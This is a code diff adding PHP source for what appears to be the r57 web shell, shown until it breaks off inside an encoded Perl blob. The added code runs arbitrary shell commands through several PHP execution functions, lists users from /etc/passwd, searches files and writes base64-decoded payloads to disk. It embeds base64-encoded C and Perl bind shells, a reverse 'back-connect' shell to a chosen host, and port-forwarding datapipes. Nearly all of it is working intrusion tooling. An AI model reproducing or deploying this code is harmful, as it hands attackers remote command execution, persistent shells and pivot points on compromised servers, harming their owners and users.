+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
